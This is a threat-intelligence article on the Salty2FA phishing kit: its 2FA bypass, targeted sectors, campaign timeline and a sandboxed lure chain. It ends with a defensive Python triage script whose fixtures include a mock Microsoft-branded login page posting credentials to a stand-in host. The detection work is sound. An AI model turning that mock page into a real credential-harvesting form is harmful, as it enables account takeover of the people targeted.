Beware of Salty2FA: A New Phishing Kit Aiming at US and EU Businesses

Phishing-as-a-Service (PhaaS) platforms continue to evolve, providing attackers with faster and cheaper methods to infiltrate corporate accounts. Researchers at ANY.RUN have identified a new threat: Salty2FA, a phishing kit engineered to circumvent various two-factor authentication (2FA) methods and evade traditional security measures. This kit has already been detected in campaigns across the United States and Europe, posing significant risks to enterprises in sectors ranging from finance to energy. Salty2FA’s multi-stage execution chain, evasive infrastructure, and capability to intercept credentials and 2FA codes render it one of the most perilous PhaaS frameworks observed this year.

Salty2FA raises the stakes for enterprises because it defeats push, SMS, and voice-based 2FA, so stolen credentials lead directly to account takeover. All three are factors whose code or approval a victim can be tricked into supplying through the attacker's page; the report does not claim the kit defeats origin-bound authenticators such as FIDO2 security keys or passkeys. The kit has targeted industries such as finance, energy, and telecommunications, turning routine phishing emails into high-impact breaches. ANY.RUN analysts have mapped Salty2FA campaigns across multiple regions and industries, with US and EU enterprises the most heavily affected. Key targeted industries in the United States include finance, healthcare, government, logistics, energy, IT consulting, education, and construction; in Europe the focus is on telecom, chemicals, energy (including solar), industrial manufacturing, real estate, and consulting.

Salty2FA began gaining traction in June 2025, with early signs possibly dating back to March or April. Confirmed campaigns have been active since late July and continue to generate numerous fresh analysis sessions daily. A recent case analysed by ANY.RUN illustrates how convincing Salty2FA can be. An employee received an email titled "External Review Request: 2025 Payment Correction," worded to create urgency and short-circuit scepticism. When the analysts opened the email in the ANY.RUN sandbox, the attack chain unfolded step by step. The email carried a payment correction request disguised as a routine business message. Its link led to a Microsoft-branded login page wrapped in Cloudflare checks, which block automated filters and crawlers from ever seeing the form. ANY.RUN's Automated Interactivity passed the verification step on its own, exposing the flow without manual clicks and cutting analysts' investigation time. Finally, the details the employee entered on the page were harvested and exfiltrated.
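The chain above (lure email, link to a Microsoft-branded sign-in page behind a Cloudflare gate, credentials posted away) can be turned into a triage check. The following is an added example written for this article; it is not ANY.RUN's tooling and not the kit's code. The allow-list of Microsoft sign-in hosts, the `*.example` hosts, and the sample email and HTML are constructed assumptions, and the captured pages are assumed to come from a sandbox that has already cleared the Cloudflare challenge, as the article describes.

```python
"""Triage helper for Salty2FA-style lures.

Added example for this article (not ANY.RUN's tooling and not the kit's
code): given a lure email and the page its link landed on, flag a
Microsoft-branded sign-in page served outside Microsoft's identity
domains, a Cloudflare Turnstile gate in front of it, and a credential
form that posts to a third-party host. The allow-list, the hosts and
the sample email/HTML below are constructed assumptions.
"""
import re
from urllib.parse import urlparse

# Assumed allow-list of hosts that serve genuine Microsoft sign-in pages.
MICROSOFT_LOGIN_HOSTS = ("login.microsoftonline.com", "login.microsoft.com", "login.live.com")

URL_RE = re.compile(r"https?://[^\s<>\"']+")

# Constructed sample lure, modelled on the subject line quoted in the article.
SAMPLE_EMAIL = """Subject: External Review Request: 2025 Payment Correction
Please review the corrected payment details before close of business:
https://docs-review-portal.example/review?id=7731
Accounts Payable"""

# Constructed landing page: Microsoft styling, Turnstile widget, form posting elsewhere.
SAMPLE_PAGE = """<html><head><title>Sign in to your account</title>
<script src="https://challenges.cloudflare.com/turnstile/v0/api.js" async defer></script>
</head><body><img alt="Microsoft" src="/static/logo.svg">
<div class="cf-turnstile" data-sitekey="0xEXAMPLE"></div>
<form method="post" action="https://collect.example.net/auth">
<input type="email" name="login"><input type="password" name="passwd">
</form></body></html>"""

# Constructed benign counterpart: same branding, served from a Microsoft host, same-origin form.
LEGIT_PAGE = """<html><head><title>Sign in to your account</title></head>
<body><img alt="Microsoft" src="/logo.svg">
<form method="post" action="/common/login"><input type="password" name="passwd"></form>
</body></html>"""


def extract_urls(text):
    """Return every http(s) URL in an email body, in order of appearance."""
    return URL_RE.findall(text)


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def is_microsoft_host(host):
    """Exact match or subdomain of an allow-listed host; look-alike suffixes do not pass."""
    return any(host == h or host.endswith("." + h) for h in MICROSOFT_LOGIN_HOSTS)


def assess_landing_page(url, html):
    """Score one landing page; returns {'verdict': ..., 'reasons': [...]}."""
    host = host_of(url)
    reasons = []
    branded = re.search(r"microsoft|sign in to your account", html, re.I) is not None
    has_password = re.search(r'<input[^>]+type="password"', html, re.I) is not None
    foreign_brand = branded and not is_microsoft_host(host)
    if foreign_brand:
        reasons.append(f"Microsoft-branded page served from {host}")
    if re.search(r'challenges\.cloudflare\.com/turnstile|class="cf-turnstile"', html):
        reasons.append("Cloudflare Turnstile gate in front of the page (blocks naive crawlers)")
    foreign_post = False
    if has_password:
        for action in re.findall(r'<form[^>]+action="([^"]+)"', html, re.I):
            ahost = host_of(action)  # relative actions yield "" and are same-origin
            if ahost and ahost != host and not is_microsoft_host(ahost):
                foreign_post = True
                reasons.append(f"credential form posts to third-party host {ahost}")
    # A Turnstile gate alone is not evidence: legitimate sites use it. The verdict
    # rests on the credential-theft signals; the gate is kept as corroboration.
    phishing = has_password and (foreign_brand or foreign_post)
    return {"verdict": "likely credential phishing" if phishing else "benign", "reasons": reasons}


def triage_lure(email_text, captured_pages):
    """captured_pages maps each email URL to (final_url, html) captured in a sandbox."""
    results = {}
    for url in extract_urls(email_text):
        final_url, html = captured_pages.get(url, (url, ""))
        results[url] = assess_landing_page(final_url, html)
    return results


if __name__ == "__main__":
    captured = {"https://docs-review-portal.example/review?id=7731":
                ("https://docs-review-portal.example/login", SAMPLE_PAGE)}
    for url, r in triage_lure(SAMPLE_EMAIL, captured).items():
        print(url, "->", r["verdict"], "|", "; ".join(r["reasons"]))
```

The verdict deliberately ignores the Cloudflare gate on its own, because many legitimate sites sit behind Turnstile; what makes the page actionable is Microsoft branding on a host Microsoft does not own, or a password form whose `action` points at a third party. Swap the `SAMPLE_PAGE` constant for HTML captured from a real sandbox session to use the check on live cases.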

Categories: Phishing Techniques, Targeted Industries, Two-Factor Authentication Bypass 

Tags: Phishing-as-a-Service, Salty2FA, Two-Factor Authentication, Credential Theft, Account Takeover, Evasive Infrastructure, Phishing Campaigns, Targeted Industries, Cybersecurity, Email Lure 
